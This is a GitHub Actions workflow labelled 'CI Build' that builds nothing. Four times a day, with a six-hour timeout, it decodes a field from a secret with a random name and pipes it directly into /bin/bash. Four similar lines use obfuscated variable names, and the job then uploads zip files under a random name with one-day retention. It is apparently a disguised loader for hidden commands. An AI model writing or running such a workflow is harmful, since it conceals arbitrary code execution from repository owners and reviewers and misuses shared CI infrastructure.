name: CI Build
on:
  workflow_dispatch:

  schedule:
    - cron: '0 1,7,13,19 * * *'
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  compile:
    runs-on: ubuntu-latest
    timeout-minutes: 360
    steps:
      - uses: actions/checkout@v4
      - name: Setup and run
        env:
          ia758: ${{ secrets.ia758 }}
        run: |
          printf '%s' "$ia758" | jq -r .vb6876 | /bin/bash
          echo $cvi8 | jq -r .rm505 | /bin/bash
          printf '%s' "$bjq0" | jq -r .cuu1551 | /bin/bash
          printf '%s' "$lxln5460" | jq -r .jmw73389 | /bin/bash
          printf '%s' "$wsgp95162" | jq -r .uqo6 | /bin/bash

      - name: Upload data
        if: always()
        uses: actions/upload-artifact@v4
        with:
          name: VwIkwCtE
          path: "*.zip"
          retention-days: 1
